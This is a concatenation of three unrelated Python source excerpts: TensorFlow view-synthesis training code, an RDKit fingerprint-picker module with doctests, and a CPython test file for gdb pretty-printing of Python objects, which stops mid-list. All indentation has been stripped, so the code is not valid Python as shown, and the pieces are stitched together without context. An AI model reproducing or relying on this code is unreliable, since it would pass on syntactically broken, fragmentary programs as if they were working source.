with sv.managed_session("local", config=config) as sess:
if continue_train:
checkpoint = tf.train.latest_checkpoint(load_dir)
if checkpoint is not None:
print("Resume training from previous checkpoint:", checkpoint)
saver.restore(sess, checkpoint)
print("starting training iters")
for step in range(1, max_steps):
start_time = time.time()
fetches = {
"train": train_op,
"global_step": global_step,
"incr_global_step": incr_global_step,
}
if step % summary_freq == 0:
fetches["summary"] = sv.summary_op
results = sess.run(fetches)
gs = results["global_step"]
if step % summary_freq == 0:
sv.summary_writer.add_summary(results["summary"], gs)
print("[Step %.8d] time: %4.4f/it" % (gs, time.time() - start_time))
if step % save_latest_freq == 0:
print(" [*] Saving checkpoint to %s..." % checkpoint_dir)
saver.save(
sess, os.path.join(checkpoint_dir, "model.ckpt"), global_step=gs)
def format_network_input(self, ref_image, psv_src_images, ref_pose,
psv_src_poses, planes, intrinsics):
"""Format the network input.
Args:
ref_image: reference source image [batch, height, width, 3]
psv_src_images: stack of source images (excluding the ref image)
[batch, height, width, 3*(num_source -1)]
ref_pose: reference world-to-camera pose (where PSV is constructed)
[batch, 4, 4]
psv_src_poses: input poses (world to camera) [batch, num_source-1, 4, 4]
planes: list of scalar depth values for each plane
intrinsics: camera intrinsics [batch, 3, 3]
Returns:
net_input: [batch, height, width, #planes, num_source*3]
"""
_, num_psv_source, _, _ = psv_src_poses.get_shape().as_list()
num_planes = tf.shape(planes)[0]
net_input = []
for i in range(num_psv_source):
curr_pose = tf.matmul(psv_src_poses[:, i], tf.matrix_inverse(ref_pose))
curr_image = psv_src_images[:, :, :, i*3:(i+1)*3]
curr_psv = pj.plane_sweep(curr_image, planes, curr_pose, intrinsics)
net_input.append(curr_psv)
net_input = tf.concat(net_input, axis=4)
ref_img_stack = tf.tile(
tf.expand_dims(ref_image, 3), [1, 1, 1, num_planes, 1])
net_input = tf.concat([net_input, ref_img_stack], axis=4)
# Append normalized plane indices
normalized_disp_inds = tf.reshape(tf.linspace(0.0, 1.0, num_planes),
[1, 1, 1, num_planes, 1])
sh = tf.shape(net_input)
normalized_disp_inds_stack = tf.tile(normalized_disp_inds,
[1, sh[1], sh[2], 1, 1])
net_input = tf.concat([net_input, normalized_disp_inds_stack], axis=4)
return net_input
def preprocess_image(self, image):
"""Preprocess the image for CNN input.
Args:
image: the input image in either float [0, 1] or uint8 [0, 255]
Returns:
A new image converted to float with range [-1, 1]
"""
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
return image * 2.0 - 1.0
def deprocess_image(self, image):
"""Undo the preprocessing.
Args:
image: the input image in float with range [-1, 1]
Returns:
A new image converted to uint8 [0, 255]
"""
image = (image + 1.)/2.
return tf.image.convert_image_dtype(image, dtype=tf.uint8)
def inv_depths(self, start_depth, end_depth, num_depths):
"""Returns reversed, sorted inverse interpolated depths.
Args:
start_depth: The first depth.
end_depth: The last depth.
num_depths: The total number of depths to create, include start_depth and
end_depth are always included and other depths are interpolated
between them, in inverse depth space.
Returns:
The depths sorted in descending order (so furthest first). This order is
useful for back to front compositing.
"""
depths = 1.0 / tf.linspace(1.0/end_depth, 1.0/start_depth, num_depths)
return depths
def compute_transmittance(self, alpha):
"""Returns transmittance of MPI voxels in reference frame.
Args:
alpha: MPI alpha values
Returns:
Transmittance of each MPI voxel in reference frame.
"""
transmittance = tf.cumprod(
1.0 - alpha + 1.0e-8, axis=3, exclusive=True, reverse=True) * alpha
return transmittance
def compute_occ_map(self, mpi_planes, rgba_layers, output_alpha,
intrinsics, rel_pose):
"""Computes an occlusion map, indicating which pixels are occluded/disoccluded.
Args:
mpi_planes: MPI plane depths
rgba_layers: an MPI
output_alpha: alphas from MPI that has been warped into target frame
intrinsics: camera intrinsics [batch, 3, 3]
rel_pose: relative pose to target camera pose
Returns:
One-sided occlusion map (positive diff in transmittance of target vs. ref)
"""
# compute occlusion map, indicating which pixels are occluded/disoccluded
# when rendering a novel view
batch_size = tf.shape(rgba_layers)[0]
img_height = tf.shape(rgba_layers)[1]
img_width = tf.shape(rgba_layers)[2]
num_mpi_planes = tf.shape(rgba_layers)[3]
depths = tf.tile(mpi_planes[:, tf.newaxis], [1, batch_size])
# Compute transmittance from reference viewpoint, then warp to tgt viewpoint
trans_ref = self.compute_transmittance(
tf.stop_gradient(rgba_layers[Ellipsis, -1]))
trans_ref = tf.transpose(trans_ref, [3, 0, 1, 2])
trans_ref = tf.expand_dims(trans_ref, -1)
trans_ref_reproj = pj.projective_forward_homography(trans_ref, intrinsics,
rel_pose, depths)
trans_ref_reproj = tf.reshape(
trans_ref_reproj,
[batch_size, num_mpi_planes, img_height, img_width, 1])
trans_ref_reproj = tf.transpose(trans_ref_reproj, [0, 2, 3, 1, 4])
# Compute transmittance of alphas that have been warped to tgt viewpoint
trans_target = self.compute_transmittance(tf.stop_gradient(output_alpha))
trans_target = tf.expand_dims(trans_target, -1)
# One-sided occlusion map (positive diff in transmittance of target vs. ref)
occ_map = tf.reduce_max(tf.nn.relu(trans_target - trans_ref_reproj), axis=3)
return occ_map
| |
# $Id$
#
# Copyright (C) 2003-2008 Greg Landrum and Rational Discovery LLC
# All Rights Reserved
#
from __future__ import print_function
from rdkit import RDConfig
from rdkit import DataStructs
from rdkit.DataStructs.TopNContainer import TopNContainer
import bisect
class GenericPicker(object):
_picks = None
def MakePicks(self, force=0):
raise NotImplementedError("GenericPicker is a virtual base class")
def __len__(self):
if self._picks is None:
self.MakePicks()
return len(self._picks)
def __getitem__(self, which):
if self._picks is None:
self.MakePicks()
return self._picks[which]
class TopNOverallPicker(GenericPicker):
""" A class for picking the top N overall best matches across a library
Connect to a database and build molecules:
>>> from rdkit import Chem
>>> import os.path
>>> from rdkit.Dbase.DbConnection import DbConnect
>>> dbName = RDConfig.RDTestDatabase
>>> conn = DbConnect(dbName,'simple_mols1')
>>> [x.upper() for x in conn.GetColumnNames()]
['SMILES', 'ID']
>>> mols = []
>>> for smi,id in conn.GetData():
... mol = Chem.MolFromSmiles(str(smi))
... mol.SetProp('_Name',str(id))
... mols.append(mol)
>>> len(mols)
12
Calculate fingerprints:
>>> probefps = []
>>> for mol in mols:
... fp = Chem.RDKFingerprint(mol)
... fp._id = mol.GetProp('_Name')
... probefps.append(fp)
Start by finding the top matches for a single probe. This ether should pull
other ethers from the db:
>>> mol = Chem.MolFromSmiles('COC')
>>> probeFp = Chem.RDKFingerprint(mol)
>>> picker = TopNOverallPicker(numToPick=2,probeFps=[probeFp],dataSet=probefps)
>>> len(picker)
2
>>> fp,score = picker[0]
>>> id = fp._id
>>> str(id)
'ether-1'
>>> score
1.0
The results come back in order:
>>> fp,score = picker[1]
>>> id = fp._id
>>> str(id)
'ether-2'
Now find the top matches for 2 probes. We'll get one ether and one acid:
>>> fps = []
>>> fps.append(Chem.RDKFingerprint(Chem.MolFromSmiles('COC')))
>>> fps.append(Chem.RDKFingerprint(Chem.MolFromSmiles('CC(=O)O')))
>>> picker = TopNOverallPicker(numToPick=3,probeFps=fps,dataSet=probefps)
>>> len(picker)
3
>>> fp,score = picker[0]
>>> id = fp._id
>>> str(id)
'acid-1'
>>> fp,score = picker[1]
>>> id = fp._id
>>> str(id)
'ether-1'
>>> score
1.0
>>> fp,score = picker[2]
>>> id = fp._id
>>> str(id)
'acid-2'
"""
def __init__(self, numToPick=10, probeFps=None, dataSet=None,
simMetric=DataStructs.TanimotoSimilarity):
"""
dataSet should be a sequence of BitVectors
"""
self.numToPick = numToPick
self.probes = probeFps
self.data = dataSet
self.simMetric = simMetric
self._picks = None
def MakePicks(self, force=0):
if self._picks is not None and not force:
return
picks = TopNContainer(self.numToPick)
for fp in self.data:
origFp = fp
bestScore = -1.0
for probeFp in self.probes:
score = DataStructs.FingerprintSimilarity(origFp, probeFp, self.simMetric)
bestScore = max(score, bestScore)
picks.Insert(bestScore, fp)
self._picks = []
for score, pt in picks:
self._picks.append((pt, score))
self._picks.reverse()
class SpreadPicker(GenericPicker):
""" A class for picking the best matches across a library
Connect to a database:
>>> from rdkit import Chem
>>> import os.path
>>> from rdkit.Dbase.DbConnection import DbConnect
>>> dbName = RDConfig.RDTestDatabase
>>> conn = DbConnect(dbName,'simple_mols1')
>>> [x.upper() for x in conn.GetColumnNames()]
['SMILES', 'ID']
>>> mols = []
>>> for smi,id in conn.GetData():
... mol = Chem.MolFromSmiles(str(smi))
... mol.SetProp('_Name',str(id))
... mols.append(mol)
>>> len(mols)
12
Calculate fingerprints:
>>> probefps = []
>>> for mol in mols:
... fp = Chem.RDKFingerprint(mol)
... fp._id = mol.GetProp('_Name')
... probefps.append(fp)
Start by finding the top matches for a single probe. This ether should pull
other ethers from the db:
>>> mol = Chem.MolFromSmiles('COC')
>>> probeFp = Chem.RDKFingerprint(mol)
>>> picker = SpreadPicker(numToPick=2,probeFps=[probeFp],dataSet=probefps)
>>> len(picker)
2
>>> fp,score = picker[0]
>>> id = fp._id
>>> str(id)
'ether-1'
>>> score
1.0
The results come back in order:
>>> fp,score = picker[1]
>>> id = fp._id
>>> str(id)
'ether-2'
Now find the top matches for 2 probes. We'll get one ether and one acid:
>>> fps = []
>>> fps.append(Chem.RDKFingerprint(Chem.MolFromSmiles('COC')))
>>> fps.append(Chem.RDKFingerprint(Chem.MolFromSmiles('CC(=O)O')))
>>> picker = SpreadPicker(numToPick=3,probeFps=fps,dataSet=probefps)
>>> len(picker)
3
>>> fp,score = picker[0]
>>> id = fp._id
>>> str(id)
'ether-1'
>>> score
1.0
>>> fp,score = picker[1]
>>> id = fp._id
>>> str(id)
'acid-1'
>>> score
1.0
>>> fp,score = picker[2]
>>> id = fp._id
>>> str(id)
'ether-2'
"""
def __init__(self, numToPick=10, probeFps=None, dataSet=None,
simMetric=DataStructs.TanimotoSimilarity, expectPickles=True, onlyNames=False):
"""
dataSet should be a sequence of BitVectors or, if expectPickles
is False, a set of strings that can be converted to bit vectors
"""
self.numToPick = numToPick
self.probes = probeFps
self.data = dataSet
self.simMetric = simMetric
self.expectPickles = expectPickles
self.onlyNames = onlyNames
self._picks = None
def MakePicks(self, force=0, silent=True):
if self._picks is not None and not force:
return
# start by getting the NxM score matrix
# (N=num probes, M=num fps)
nProbes = len(self.probes)
scores = [None] * nProbes
for i in range(nProbes):
scores[i] = []
j = 0
fps = []
for origFp in self.data:
for i in range(nProbes):
score = DataStructs.FingerprintSimilarity(self.probes[i], origFp, self.simMetric)
bisect.insort(scores[i], (score, j))
if len(scores[i]) >= self.numToPick:
del scores[self.numToPick:]
if self.onlyNames and hasattr(origFp, '_fieldsFromDb'):
fps.append(origFp._fieldsFromDb[0])
else:
fps.append(origFp)
j += 1
if not silent and not j % 1000:
print('scored %d fps' % j)
# sort the rows of that matrix:
#for i in range(nProbes):
# scores[i].sort()
# now go probe by probe and select the current top entry until we are finished:
nPicked = 0
self._picks = []
taken = [0] * len(fps)
while nPicked < self.numToPick:
rowIdx = nPicked % len(scores)
row = scores[rowIdx]
score, idx = row.pop()
# make sure we haven't taken this one already (from another row):
while taken[idx] and len(row):
score, idx = row.pop()
if not taken[idx]:
fp = fps[idx]
self._picks.append((fp, score))
taken[idx] = 1
nPicked += 1
#------------------------------------
#
# doctest boilerplate
#
def _test():
import doctest, sys
return doctest.testmod(sys.modules["__main__"])
if __name__ == '__main__':
import sys
failed, tried = _test()
sys.exit(failed)
| |
# Verify that gdb can pretty-print the various PyObject* types
#
# The code for testing gdb was adapted from similar work in Unladen Swallow's
# Lib/test/test_jit_gdb.py
import os
import re
import subprocess
import sys
import sysconfig
import unittest
import sysconfig
from test import test_support
from test.test_support import run_unittest, findfile
# Is this Python configured to support threads?
try:
import thread
except ImportError:
thread = None
def get_gdb_version():
try:
proc = subprocess.Popen(["gdb", "-nx", "--version"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
version = proc.communicate()[0]
except OSError:
# This is what "no gdb" looks like. There may, however, be other
# errors that manifest this way too.
raise unittest.SkipTest("Couldn't find gdb on the path")
# Regex to parse:
# 'GNU gdb (GDB; SUSE Linux Enterprise 12) 7.7\n' -> 7.7
# 'GNU gdb (GDB) Fedora 7.9.1-17.fc22\n' -> 7.9
# 'GNU gdb 6.1.1 [FreeBSD]\n' -> 6.1
# 'GNU gdb (GDB) Fedora (7.5.1-37.fc18)\n' -> 7.5
match = re.search(r"^GNU gdb.*?\b(\d+)\.(\d+)", version)
if match is None:
raise Exception("unable to parse GDB version: %r" % version)
return (version, int(match.group(1)), int(match.group(2)))
gdb_version, gdb_major_version, gdb_minor_version = get_gdb_version()
if gdb_major_version < 7:
raise unittest.SkipTest("gdb versions before 7.0 didn't support python "
"embedding. Saw %s.%s:\n%s"
% (gdb_major_version, gdb_minor_version,
gdb_version))
if sys.platform.startswith("sunos"):
raise unittest.SkipTest("test doesn't work very well on Solaris")
# Location of custom hooks file in a repository checkout.
checkout_hook_path = os.path.join(os.path.dirname(sys.executable),
'python-gdb.py')
def run_gdb(*args, **env_vars):
"""Runs gdb in batch mode with the additional arguments given by *args.
Returns its (stdout, stderr)
"""
if env_vars:
env = os.environ.copy()
env.update(env_vars)
else:
env = None
# -nx: Do not execute commands from any .gdbinit initialization files
# (issue #22188)
base_cmd = ('gdb', '--batch', '-nx')
if (gdb_major_version, gdb_minor_version) >= (7, 4):
base_cmd += ('-iex', 'add-auto-load-safe-path ' + checkout_hook_path)
out, err = subprocess.Popen(base_cmd + args,
# Redirect stdin to prevent GDB from messing with terminal settings
stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env,
).communicate()
return out, err
if not sysconfig.is_python_build():
raise unittest.SkipTest("test_gdb only works on source builds at the moment.")
# Verify that "gdb" was built with the embedded python support enabled:
gdbpy_version, _ = run_gdb("--eval-command=python import sys; print(sys.version_info)")
if not gdbpy_version:
raise unittest.SkipTest("gdb not built with embedded python support")
# Verify that "gdb" can load our custom hooks, as OS security settings may
# disallow this without a customised .gdbinit.
cmd = ['--args', sys.executable]
_, gdbpy_errors = run_gdb('--args', sys.executable)
if "auto-loading has been declined" in gdbpy_errors:
msg = "gdb security settings prevent use of custom hooks: "
raise unittest.SkipTest(msg + gdbpy_errors.rstrip())
def python_is_optimized():
cflags = sysconfig.get_config_vars()['PY_CFLAGS']
final_opt = ""
for opt in cflags.split():
if opt.startswith('-O'):
final_opt = opt
return final_opt not in ('', '-O0', '-Og')
def gdb_has_frame_select():
# Does this build of gdb have gdb.Frame.select ?
stdout, _ = run_gdb("--eval-command=python print(dir(gdb.Frame))")
m = re.match(r'.*\[(.*)\].*', stdout)
if not m:
raise unittest.SkipTest("Unable to parse output from gdb.Frame.select test")
gdb_frame_dir = m.group(1).split(', ')
return "'select'" in gdb_frame_dir
HAS_PYUP_PYDOWN = gdb_has_frame_select()
class DebuggerTests(unittest.TestCase):
"""Test that the debugger can debug Python."""
def get_stack_trace(self, source=None, script=None,
breakpoint='PyObject_Print',
cmds_after_breakpoint=None,
import_site=False):
'''
Run 'python -c SOURCE' under gdb with a breakpoint.
Support injecting commands after the breakpoint is reached
Returns the stdout from gdb
cmds_after_breakpoint: if provided, a list of strings: gdb commands
'''
# We use "set breakpoint pending yes" to avoid blocking with a:
# Function "foo" not defined.
# Make breakpoint pending on future shared library load? (y or [n])
# error, which typically happens python is dynamically linked (the
# breakpoints of interest are to be found in the shared library)
# When this happens, we still get:
# Function "PyObject_Print" not defined.
# emitted to stderr each time, alas.
# Initially I had "--eval-command=continue" here, but removed it to
# avoid repeated print breakpoints when traversing hierarchical data
# structures
# Generate a list of commands in gdb's language:
commands = ['set breakpoint pending yes',
'break %s' % breakpoint,
# The tests assume that the first frame of printed
# backtrace will not contain program counter,
# that is however not guaranteed by gdb
# therefore we need to use 'set print address off' to
# make sure the counter is not there. For example:
# #0 in PyObject_Print ...
# is assumed, but sometimes this can be e.g.
# #0 0x00003fffb7dd1798 in PyObject_Print ...
'set print address off',
'run']
# GDB as of 7.4 onwards can distinguish between the
# value of a variable at entry vs current value:
# http://sourceware.org/gdb/onlinedocs/gdb/Variables.html
# which leads to the selftests failing with errors like this:
# AssertionError: 'v@entry=()' != '()'
# Disable this:
if (gdb_major_version, gdb_minor_version) >= (7, 4):
commands += ['set print entry-values no']
if cmds_after_breakpoint:
commands += cmds_after_breakpoint
else:
commands += ['backtrace']
# print commands
# Use "commands" to generate the arguments with which to invoke "gdb":
args = ["gdb", "--batch", "-nx"]
args += ['--eval-command=%s' % cmd for cmd in commands]
args += ["--args",
sys.executable]
if not import_site:
# -S suppresses the default 'import site'
args += ["-S"]
if source:
args += ["-c", source]
elif script:
args += [script]
# print args
# print ' '.join(args)
# Use "args" to invoke gdb, capturing stdout, stderr:
out, err = run_gdb(*args, PYTHONHASHSEED='0')
errlines = err.splitlines()
unexpected_errlines = []
# Ignore some benign messages on stderr.
ignore_patterns = (
'Function "%s" not defined.' % breakpoint,
"warning: no loadable sections found in added symbol-file"
" system-supplied DSO",
"warning: Unable to find libthread_db matching"
" inferior's thread library, thread debugging will"
" not be available.",
"warning: Cannot initialize thread debugging"
" library: Debugger service failed",
'warning: Could not load shared library symbols for '
'linux-vdso.so',
'warning: Could not load shared library symbols for '
'linux-gate.so',
'warning: Could not load shared library symbols for '
'linux-vdso64.so',
'Do you need "set solib-search-path" or '
'"set sysroot"?',
'warning: Source file is more recent than executable.',
# Issue #19753: missing symbols on System Z
'Missing separate debuginfo for ',
'Try: zypper install -C ',
)
for line in errlines:
if not line.startswith(ignore_patterns):
unexpected_errlines.append(line)
# Ensure no unexpected error messages:
self.assertEqual(unexpected_errlines, [])
return out
def get_gdb_repr(self, source,
cmds_after_breakpoint=None,
import_site=False):
# Given an input python source representation of data,
# run "python -c'print DATA'" under gdb with a breakpoint on
# PyObject_Print and scrape out gdb's representation of the "op"
# parameter, and verify that the gdb displays the same string
#
# For a nested structure, the first time we hit the breakpoint will
# give us the top-level structure
gdb_output = self.get_stack_trace(source, breakpoint='PyObject_Print',
cmds_after_breakpoint=cmds_after_breakpoint,
import_site=import_site)
# gdb can insert additional '\n' and space characters in various places
# in its output, depending on the width of the terminal it's connected
# to (using its "wrap_here" function)
m = re.match('.*#0\s+PyObject_Print\s+\(\s*op\=\s*(.*?),\s+fp=.*\).*',
gdb_output, re.DOTALL)
if not m:
self.fail('Unexpected gdb output: %r\n%s' % (gdb_output, gdb_output))
return m.group(1), gdb_output
def assertEndsWith(self, actual, exp_end):
'''Ensure that the given "actual" string ends with "exp_end"'''
self.assertTrue(actual.endswith(exp_end),
msg='%r did not end with %r' % (actual, exp_end))
def assertMultilineMatches(self, actual, pattern):
m = re.match(pattern, actual, re.DOTALL)
self.assertTrue(m, msg='%r did not match %r' % (actual, pattern))
def get_sample_script(self):
return findfile('gdb_sample.py')
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
class PrettyPrintTests(DebuggerTests):
def test_getting_backtrace(self):
gdb_output = self.get_stack_trace('print 42')
self.assertTrue('PyObject_Print' in gdb_output)
def assertGdbRepr(self, val, cmds_after_breakpoint=None):
# Ensure that gdb's rendering of the value in a debugged process
# matches repr(value) in this process:
gdb_repr, gdb_output = self.get_gdb_repr('print ' + repr(val),
cmds_after_breakpoint)
self.assertEqual(gdb_repr, repr(val))
def test_int(self):
'Verify the pretty-printing of various "int" values'
self.assertGdbRepr(42)
self.assertGdbRepr(0)
self.assertGdbRepr(-7)
self.assertGdbRepr(sys.maxint)
self.assertGdbRepr(-sys.maxint)
def test_long(self):
'Verify the pretty-printing of various "long" values'
self.assertGdbRepr(0L)
self.assertGdbRepr(1000000000000L)
self.assertGdbRepr(-1L)
self.assertGdbRepr(-1000000000000000L)
def test_singletons(self):
'Verify the pretty-printing of True, False and None'
self.assertGdbRepr(True)
self.assertGdbRepr(False)
self.assertGdbRepr(None)
def test_dicts(self):
'Verify the pretty-printing of dictionaries'
self.assertGdbRepr({})
self.assertGdbRepr({'foo': 'bar'})
self.assertGdbRepr("{'foo': 'bar', 'douglas':42}")
def test_lists(self):
'Verify the pretty-printing of lists'
self.assertGdbRepr([])
self.assertGdbRepr(range(5))
def test_strings(self):
'Verify the pretty-printing of strings'
self.assertGdbRepr('')
self.assertGdbRepr('And now for something hopefully the same')
self.assertGdbRepr('string with embedded NUL here \0 and then some more text')
self.assertGdbRepr('this is byte 255:\xff and byte 128:\x80')
def test_tuples(self):
'Verify the pretty-printing of tuples'
self.assertGdbRepr(tuple())
self.assertGdbRepr((1,))
self.assertGdbRepr(('foo', 'bar', 'baz'))
def test_unicode(self):
'Verify the pretty-printing of unicode values'
# Test the empty unicode string:
self.assertGdbRepr(u'')
self.assertGdbRepr(u'hello world')
# Test printing a single character:
# U+2620 SKULL AND CROSSBONES
self.assertGdbRepr(u'\u2620')
# Test printing a Japanese unicode string
# (I believe this reads "mojibake", using 3 characters from the CJK
# Unified Ideographs area, followed by U+3051 HIRAGANA LETTER KE)
self.assertGdbRepr(u'\u6587\u5b57\u5316\u3051')
# Test a character outside the BMP:
# U+1D121 MUSICAL SYMBOL C CLEF
# This is:
# UTF-8: 0xF0 0x9D 0x84 0xA1
# UTF-16: 0xD834 0xDD21
# This will only work on wide-unicode builds:
self.assertGdbRepr(u"\U0001D121")
def test_sets(self):
'Verify the pretty-printing of sets'
self.assertGdbRepr(set())
rep = self.get_gdb_repr("print set(['a', 'b'])")[0]
self.assertTrue(rep.startswith("set(["))
self.assertTrue(rep.endswith("])"))
self.assertEqual(eval(rep), {'a', 'b'})
rep = self.get_gdb_repr("print set([4, 5])")[0]
self.assertTrue(rep.startswith("set(["))
self.assertTrue(rep.endswith("])"))
self.assertEqual(eval(rep), {4, 5})
# Ensure that we handled sets containing the "dummy" key value,
# which happens on deletion:
gdb_repr, gdb_output = self.get_gdb_repr('''s = set(['a','b'])
s.pop()
print s''')
self.assertEqual(gdb_repr, "set(['b'])")
def test_frozensets(self):
'Verify the pretty-printing of frozensets'
self.assertGdbRepr(frozenset())
rep = self.get_gdb_repr("print frozenset(['a', 'b'])")[0]
self.assertTrue(rep.startswith("frozenset(["))
self.assertTrue(rep.endswith("])"))
self.assertEqual(eval(rep), {'a', 'b'})
rep = self.get_gdb_repr("print frozenset([4, 5])")[0]
self.assertTrue(rep.startswith("frozenset(["))
self.assertTrue(rep.endswith("])"))
self.assertEqual(eval(rep), {4, 5})
def test_exceptions(self):
# Test a RuntimeError
gdb_repr, gdb_output = self.get_gdb_repr('''
try:
raise RuntimeError("I am an error")
except RuntimeError, e:
print e
''')
self.assertEqual(gdb_repr,
"exceptions.RuntimeError('I am an error',)")
# Test division by zero:
gdb_repr, gdb_output = self.get_gdb_repr('''
try:
a = 1 / 0
except ZeroDivisionError, e:
print e
''')
self.assertEqual(gdb_repr,
"exceptions.ZeroDivisionError('integer division or modulo by zero',)")
def test_classic_class(self):
'Verify the pretty-printing of classic class instances'
gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo:
pass
foo = Foo()
foo.an_int = 42
print foo''')
m = re.match(r'<Foo\(an_int=42\) at remote 0x[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected classic-class rendering %r' % gdb_repr)
def test_modern_class(self):
'Verify the pretty-printing of new-style class instances'
gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(object):
pass
foo = Foo()
foo.an_int = 42
print foo''')
m = re.match(r'<Foo\(an_int=42\) at remote 0x[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected new-style class rendering %r' % gdb_repr)
def test_subclassing_list(self):
'Verify the pretty-printing of an instance of a list subclass'
gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(list):
pass
foo = Foo()
foo += [1, 2, 3]
foo.an_int = 42
print foo''')
m = re.match(r'<Foo\(an_int=42\) at remote 0x[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected new-style class rendering %r' % gdb_repr)
def test_subclassing_tuple(self):
'Verify the pretty-printing of an instance of a tuple subclass'
# This should exercise the negative tp_dictoffset code in the
# new-style class support
gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(tuple):
pass
foo = Foo((1, 2, 3))
foo.an_int = 42
print foo''')
m = re.match(r'<Foo\(an_int=42\) at remote 0x[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected new-style class rendering %r' % gdb_repr)
def assertSane(self, source, corruption, expvalue=None, exptype=None):
'''Run Python under gdb, corrupting variables in the inferior process
immediately before taking a backtrace.
Verify that the variable's representation is the expected failsafe
representation'''
if corruption:
cmds_after_breakpoint=[corruption, 'backtrace']
else:
cmds_after_breakpoint=['backtrace']
gdb_repr, gdb_output = \
self.get_gdb_repr(source,
cmds_after_breakpoint=cmds_after_breakpoint)
if expvalue:
if gdb_repr == repr(expvalue):
# gdb managed to print the value in spite of the corruption;
# this is good (see http://bugs.python.org/issue8330)
return
if exptype:
pattern = '<' + exptype + ' at remote 0x[0-9a-f]+>'
else:
# Match anything for the type name; 0xDEADBEEF could point to
# something arbitrary (see http://bugs.python.org/issue8330)
pattern = '<.* at remote 0x[0-9a-f]+>'
m = re.match(pattern, gdb_repr)
if not m:
self.fail('Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
def test_NULL_ptr(self):
'Ensure that a NULL PyObject* is handled gracefully'
gdb_repr, gdb_output = (
self.get_gdb_repr('print 42',
cmds_after_breakpoint=['set variable op=0',
'backtrace'])
)
self.assertEqual(gdb_repr, '0x0')
def test_NULL_ob_type(self):
'Ensure that a PyObject* with NULL ob_type is handled gracefully'
self.assertSane('print 42',
'set op->ob_type=0')
def test_corrupt_ob_type(self):
'Ensure that a PyObject* with a corrupt ob_type is handled gracefully'
self.assertSane('print 42',
'set op->ob_type=0xDEADBEEF',
expvalue=42)
def test_corrupt_tp_flags(self):
'Ensure that a PyObject* with a type with corrupt tp_flags is handled'
self.assertSane('print 42',
'set op->ob_type->tp_flags=0x0',
expvalue=42)
def test_corrupt_tp_name(self):
'Ensure that a PyObject* with a type with corrupt tp_name is handled'
self.assertSane('print 42',
'set op->ob_type->tp_name=0xDEADBEEF',
expvalue=42)
def test_NULL_instance_dict(self):
'Ensure that a PyInstanceObject with with a NULL in_dict is handled'
self.assertSane('''
class Foo:
pass
foo = Foo()
foo.an_int = 42
print foo''',
'set ((PyInstanceObject*)op)->in_dict = 0',
exptype='Foo')
def test_builtins_help(self):
'Ensure that the new-style class _Helper in site.py can be handled'
# (this was the issue causing tracebacks in
# http://bugs.python.org/issue8032#msg100537 )
gdb_repr, gdb_output = self.get_gdb_repr('print __builtins__.help', import_site=True)
m = re.match(r'<_Helper at remote 0x[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected rendering %r' % gdb_repr)
def test_selfreferential_list(self):
'''Ensure that a reference loop involving a list doesn't lead proxyval
into an infinite loop:'''
gdb_repr, gdb_output = \
self.get_gdb_repr("a = [3, 4, 5] ; a.append(a) ; print a")
self.assertEqual(gdb_repr, '[3, 4, 5, [...]]')
gdb_repr, gdb_output = \
self.get_gdb_repr("a = [3, 4, 5] ; b = [a] ; a.append(b) ; print a")
self.assertEqual(gdb_repr, '[3, 4, 5, [[...]]]')
def test_selfreferential_dict(self):
'''Ensure that a reference loop involving a dict doesn't lead proxyval
into an infinite loop:'''
gdb_repr, gdb_output = \
self.get_gdb_repr("a = {} ; b = {'bar':a} ; a['foo'] = b ; print a")
self.assertEqual(gdb_repr, "{'foo': {'bar': {...}}}")
def test_selfreferential_old_style_instance(self):
gdb_repr, gdb_output = \
self.get_gdb_repr('''
class Foo:
pass
foo = Foo()
foo.an_attr = foo
print foo''')
self.assertTrue(re.match('<Foo\(an_attr=<\.\.\.>\) at remote 0x[0-9a-f]+>',
gdb_repr),
'Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
def test_selfreferential_new_style_instance(self):
gdb_repr, gdb_output = \
self.get_gdb_repr('''
class Foo(object):
pass
foo = Foo()
foo.an_attr = foo
print foo''')
self.assertTrue(re.match('<Foo\(an_attr=<\.\.\.>\) at remote 0x[0-9a-f]+>',
gdb_repr),
'Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
gdb_repr, gdb_output = \
self.get_gdb_repr('''
class Foo(object):
pass
a = Foo()
b = Foo()
a.an_attr = b
b.an_attr = a
print a''')
self.assertTrue(re.match('<Foo\(an_attr=<Foo\(an_attr=<\.\.\.>\) at remote 0x[0-9a-f]+>\) at remote 0x[0-9a-f]+>',
gdb_repr),
'Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
def test_truncation(self):
'Verify that very long output is truncated'
gdb_repr, gdb_output = self.get_gdb_repr('print range(1000)')
self.assertEqual(gdb_repr,
"[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, "
"14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, "
"27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, "
"40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, "
"53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, "
"66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, "
"79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, "
"92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, "
"104, 105, 106, 107, 108, 109, 110, 111, 112, 113, "
"114, 115, 116, 117, 118, 119, 120, 121, 122, 123, "
"124, 125, 126, 127, 128, 129, 130, 131, 132, 133, "
"134, 135, 136, 137, 138, 139, 140, 141, 142, 143, "
"144, 145, 146, 147, 148, 149, 150, 151, 152, 153, "
"154, 155, 156, 157, 158, 159, 160, 161, 162, 163, "
"164, 165, 166, 167, 168, 169, 170, 171, 172, 173, "
